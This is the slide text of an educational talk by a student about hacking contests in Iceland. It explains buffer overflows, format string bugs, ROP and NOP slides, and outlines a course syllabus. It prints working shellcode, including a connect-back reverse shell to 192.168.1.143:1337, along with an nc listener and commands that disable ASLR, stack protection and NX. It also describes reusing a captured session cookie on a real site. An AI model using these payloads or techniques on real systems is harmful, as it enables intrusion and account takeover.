Transcript pptx - trauzti


I am Trausti Saemundsson,
MSc student at Reykjavik
University in Iceland
a

My supervisor is Ymir Vigfusson

I´m here in London doing
research with Gregory Chockler
on a multitenant cache algorithm
Trausti
Ymir
Gregory

I have a BSc in Mathematics with focus on
Computer Science
 Went to the IMO (International Mathematical
Olympiad) in 2008


I really like programming contests!
Participated in:
 Facebook Hacker Cup 2013
 NWERC 2012 in Delft, The Netherlands. First Icelandic team!
 NCPC 2012
 IEEEXtreme 24-Hour Programming Competition 2012
 Google Code Jam 2012
 Projecteuler, 112 solved problems

Today I´m going to tell you about two
Icelandic hacking contests and show you a
video!

I will introduce the necessary concepts for
understanding what we were hacking

I will also introduce the schedule for a 3
week course “Computer Security” taught at
Reykjavik University in May 2013

To be able to defend ourselves!

In order to defend ourselves against hackers,
we must know how they think

By participating in a hacking contest,
students learn the concepts extremely fast

Hacking: The craft of exploiting software to
do something it is not supposed to do.

Buffer overflows, shellcodes and format
string exploits

If you haven´t heard about those concepts, I
will introduce them!
/* echo.c */
void echo() {
char buf[4]; /* Very small */
gets(buf);
/* Dangerous function */
puts(buf);
}
int main() {
printf(“Type a string:”);
echo();
}


Okay
Buffer overflow!
unix>./echo
Type a string:123
123
unix>./echo
Type a string:123456789ABC
123456789ABC
Segmentation Fault
/* safeecho.c */
void echo() {
char buf[4];
fgets(stdin, buf, 4); /* Read 3 bytes and add ‘\0’ */
puts(buf);
}
int main() {
printf(“Type a string:”);
echo();
}


Okay
Okay as well!
unix>./safeecho
Type a string:123
123
unix>./safeecho
Type a string:123456789ABC
123

C stores all variables on stack, but also other
important stuff!
 E.g. the address of where it was last executing (called the
return address)
Stack frame for
main
void echo() {
char buf[4];
gets(buf);
puts(buf);
}
int main() {
...
echo();
}
Return address
Old ebp
buf
Rest of stack frame
for echo
Stack grows down

The input from the user overwrites the return
address!
Stack frame for
main
void echo() {
char buf[4];
gets(buf);
puts(buf);
}
int main() {
...
echo();
}
Return address
inputOld
from
ebpuser
buf
Rest of stack frame
for echo
Could return
to anywhere!

Where would we want to return?
 Could return to OUR input buffer
 Treated as machine code! Can execute anything
Stack frame for
main
void echo() {
char buf[4];
gets(buf);
puts(buf);
}
int main() {
...
echo();
}
Return address
inputOld
from
ebpuser
buf
Rest of stack frame
for echo
Could return
to anywhere!

What do we want to execute?
 Could eject CDROM or delete all files
 Could launch a shell (say „/bin/bash“)
 Could open a new port and launch a shell there

The coolest thing to do with a buffer overflow is to
launch a shell!

A small piece of machine code that launches a shell
like /bin/bash is called a shellcode
/* Spawn a local shell */
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

When executed, this shellcode stops the currently
running program and opens /bin/sh instead
char connectbackshell[] =
"\x31\xc0\x31\xdb\x99\x50\x6a\x01\x6a\x02\x89"
"\xe1\xfe\xc3\xb0\x66\xcd\x80\x89\xc6\x68"
"\xc0\xa8\x01\x8f" // IP: 192.168.1.143
"\x66\x68"
"\x05\x39"
// Port: 1337
"\xb2\x02\x66\x52\x89\xe1\x6a\x10\x51\x56\x89"
"\xe1\xb3\x03\xb0\x66\xcd\x80\x99\x56\x8b\x1c"
"\x24\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80"
"\x75\xf8\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
When executed, this shellcode stops the currently
running program and opens a connect back shell to
192.168.1.143 on port 1337 instead
 The IP 192.168.1.143 must be listening on port 1337
with netcat:
nc –l –vv –p 1337



GCC stack protection
You can disable it by passing the compiler flag:
-fno-stack-protector


Address space layout randomization (ASLR)
It can be disabled in Linux with:
sysctl -w kernel.randomize_va_space=0


Non-executable protection (NX Bit)
Disable it by booting Linux up with the parameter:
noexec=off

The non executable protection makes parts of the
stack and the heap non-executable
We can get past the non-executable protection by
using:
 Return-oriented programming (ROP).


ROP is to cherry pick parts of the code that is
ALREADY executable to put together our evil code

Like making a mosaic!

Address space layout randomization (ASLR) is a
security method which randomizes the starting
address of the stack, heap and the executable code

One way to get past this is to use NOP slides

NOP (0x90) is a machine language instruction for
doing nothing

The technique is to make an exploit like this:
<address><a lot of nops><shellcode>

We overwrite the return address with <address>
and then we hope that some part of the NOP slide
is located at this address

If that happens, NOPs get executed one by one
until our shellcode gets executed 
/* fm.c */
int main() {
char buf[128];
printf(“Type a string:”);
gets(buf);
printf(buf);
}

Prints a value from the stack

Writes a value to the stack

Very dangerous!
unix>./fm
Type a string:%p
0xff8b7864
unix>./fm
Type a string:%n
unix>./fm
Type a string:%n%n%n%n%n
Segmentation fault

Format string vulnerabilities
 Using printf (cmd); instead of printf (“%s”, cmd);
 Lazy programmers… bugs like this still found!

Allows an attacker to investigate memory

Attacker can also write to an arbitrary address
 Using the %n primitive carefully
 Can take over the program, even remotely

Vulnerable chat server running on an Ubuntu 11.04
server

The C source code is available at
http://www.ymsir.com/contest.tgz

The contest had 4 different levels

Level 1: Read the source code and find a secret
string

Level 2: Make a function print a secret message

Level 3: Spawn a connect back shell via a buffer
overflow

Level 4: Use a format string exploit to spawn a
local shell
Two persons finished the fourth level
They competed in a final standoff in the Icelandic
television
 Had to spawn a shell with a buffer overflow



One file given:
http://ymsir.com/hacking/mystery.jpg

Several levels, with secret keywords to submit to
www.ymsir.com/hacking/

First one had to discover that the file was a gzipped
jpg file

Next to run f5-steganography on the jpg file to
extract a txt file with a link

The link contained a file

The file was a uuencoded C source code

The source code did a lot of random bit
manipulations to the two arguments, a string and
a number

The program then printed an IP address

The correct arguments to the C program were
given as hints in previous stages

The IP address that came from the C program
dumped some code on port 666

This code was a password protected ZIP archive

2d6aa9e26592e9cf8e40d7e6753b87ba was given at
a previous stage and this is md5(cracks) so the
password to the ZIP archive was cracks

The ZIP archive contained a TCPDUMP

By using wireshark to analyze the TCPDUMP, I
found Ymir´s session cookie to www.quora.com

So I used this session cookie
and changed his profile
picture to a cat

He got revenge by booting my laptop up into single
user mode and changing my facebook profile
picture:
And then he said on my half on facebook:
“Some people just want to see the world burn”


After that I settled for peace 

So I was not supposed to find this session cookie in
the TCPDUMP but I was supposed to find a link to
www.ymsir.com/ctf/ 

This website contains:
STAGE ZEBRA. Not authenticated.

When you give the website GET arguments:
www.ymsir.com/ctf/?user=ctf it contains:
*Hungry* for password
By using a hint from a previous level the password
was f00d, so by giving another argument:
www.ymsir.com/ctf/?user=ctf&password=f00d


This site contains a private RSA key!

It also contains an IP address in the HTTP header

Of course the RSA key was password protected
with the password cracks

By using the RSA key, the username: ctf and the IP
address one got into the server

The previous C source code had been compiled on
this server with privileges of the user: ctf-final

So next step was to find a buffer overflow
vulnerability in the source code!

Then exploit it!

And then you were eligible to compete in the finals

The finals were held on stage in a
big cinema in Iceland

Every contestant got an Ubuntu
8.04 virtual machine with the same
password

This virtual machine had several vulnerable C
programs running

There was also a program /publish which we ran on
the other computers to get points on the
scoreboard

Now I will show you a video of the contest!

I had a robust exploit ready which got me a
connect back shell to all the other computers

I ran it in the beginning of the contest and put a
while loop on every computer:

while true; do /publish trausti; sleep 1s;
done &

Helgi Kristvin however uses a Dvorak keyboard
and types extremely fast

Helgi Kristvin – The winner
Before I could change my SSH password, he
connected to my computer and replaced /bin/ps
with a program that printed an old output from
/bin/ps

So I could not kill his ssh session into my
computer! 

The participants of the contests had tremendous
fun!

Learnt a lot by themselves!
Also used resources like:
http://smashthestack.org/
http://insecure.org/stf/smashstack.html


And of course gdb 

Ymir Vigfusson (www.ymsir.com) is
the organizer of those hacking
contests

He will also teach a 3 week course
called Computer Security this spring

This course is focused on
vulnerabilities rather than
conventional security

More complex hacking techniques!

Schedule on next slide!

Week 1 (24/4 - 30/4)
 Review of x86 assembly & C. Day assignment: decompiling x86. (+5%)
 Basic buffer overflows in C programs. Lab #1: Buflab (10%)
 Shellcodes and stack overflows. Lab #2: Stacklab (10%)
 Wireless security. Optional lab: Wirelab (+5%)

Week 2 (1/5 – 7/5)
 Heap overflows. Lab #3: Presentation (10%)
 Defenses (NX, ASLR).
 Format string attacks. Lab #4: Formatlab (10%)

Week 3 (8/5-11/5)
 Web/logic and injection attacks. Lab #5: SQLlab (10%)
 Network security, spoofing, sniffing, botnets.
 Exploiting randomness. Lab #6: Entropylab (10%)

Final written exam (14/5?) (40%. Minimum 5.0/10.0 to pass)

You saw examples of Buffer overflows, shellcodes and
format string vulnerabilities

A brief overview of what happened at two Icelandic
hacking contests!

I hope you enjoyed this presentation

If you haven´t already, I hope that you will be holding
some Hacking Contests here!
 Thank you!